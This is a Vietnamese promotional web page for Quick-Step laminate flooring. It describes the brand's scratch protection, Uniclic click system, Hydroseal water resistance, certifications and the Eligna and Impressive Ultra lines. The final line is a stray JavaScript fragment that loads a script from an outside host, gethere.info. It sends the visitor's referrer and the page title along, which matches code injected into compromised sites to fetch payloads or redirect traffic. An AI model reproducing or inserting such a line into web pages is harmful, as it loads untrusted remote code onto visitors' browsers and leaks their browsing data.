SÀN GỖ QUICK STEP

Giới thiệu về sàn gỗ Quick step Bỉ

Xu hướng sử dụng sàn gỗ công nghiệp cao cấp từ châu Âu đang ngày càng rõ nét tại Việt Nam với số lượng thương hiệu tăng lên một cách chóng mặt chỉ trong vòng hơn một năm. Xu hướng này đã thực sự lên đến đỉnh điểm với sự xuất hiện của sàn gỗ Quick step, dòng sàn gỗ công nghiệp cao cấp được coi là thương hiệu số 1 thế giới hiện nay với mạng lưới phủ kín trên toàn thế giới.

Sản xuất tại Bỉ bởi các nhà thiết kế của hệ thống Uniclic, sàn gỗ Quick-Step là một sự lựa chọn tuyệt vời để xem xét nếu bạn đang nghĩ đến việc sử dụng hoặc thay đổi sàn nhà kể cả trong nhà dân cư  hay không gian thương mại. Dễ dàng lắp đặt và vệ sinh, hoàn hảo cho những người bị dị ứng và cam kết bảo hành 25 năm của nhà sản xuất là một trong rất nhiều lý do để lựa chọn sàn gỗ Quick Step.

Sự khác biệt của sàn gỗ Quick step Bỉ

  • Lớp bề mặt của sàn gỗ Quick step sử dụng công nghệ bảo vệ Scrach Guard, kết quả của nhiều năm nghiên cứu và đầu tư trong lĩnh vực độ bền giúp loại sàn này có khả năng chống xước gấp mười lần so với loại sàn thông thường.

sàn gỗ quick step chống xước tốt

  • Hệ thống hèm khóa rất chắc chắn . Sàn gỗ Quick step Bỉ được áp dụng công nghệ Uniclic vượt trội được cấp bằng sáng chế cho khả năng liên kết chắc chắn và dễ dàng lắp đặt.

công nghệ uniclic của sàn gỗ quick step

  • Khả năng chịu nước siêu việt. Sàn gỗ Quick step là dòng sàn đầu tiên áp dụng công nghệ chịu nước Hydroseal 100% không thấm nước mà không sử dụng phụ gia.
  • Sự thân thiện với môi trường sống : Chứng nhận PEFC đảm bảo rằng tất cả các gỗ được sử dụng để sản xuất ván HDF cốt lõi của nhà sản xuất là có nguồn gốc từ rừng được quản lý bền vững. Ngoài ra, sàn gỗ Quick step được chứng nhận sản phẩm môi trường (EPD). Chứng chỉ quốc tế công nhận điều này cho thấy các hoạt động môi trường của sàn gỗ Quick step trong suốt toàn bộ vòng đời của chúng.

sàn gỗ quick step và các chứng nhận môi trường

Các dòng sàn gỗ Quick step tại Việt Nam

Dòng sàn gỗ Quick step Eligna

Sàn gỗ Quick-Step Eligna  là một lựa chọn tuyệt vời cho mục đích dân dụng, với các tấm ván sàn gỗ tạo ra một hiệu ứng mềm mại và trang nhã khi đặt. Khi được trang bị, chiều dài cân đối và chiều rộng của tấm ván chắc chắn để thêm một yếu tố cho sự trang nhã tại mỗi phòng.

 Dòng sàn gỗ Quick step Impressive Ultra

Một trong những giải pháp sàn mới nhất của sàn gỗ Quick-Step được thiết kế để trông rất tự nhiên. Dòng sàn gỗ Ultra nhiều ấn tượng hơn với vân gỗ chân thực bao gồm toàn bộ thanh ván. Công nghệ Hydroseal áp dụng toàn diện tại dòng sàn này giúp nó trở thành dòng sàn chống nước tốt nhất thế giới và có thể sử dụng tại cả bếp và phòng tắm.

Danh mục sàn gỗ Quick step

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;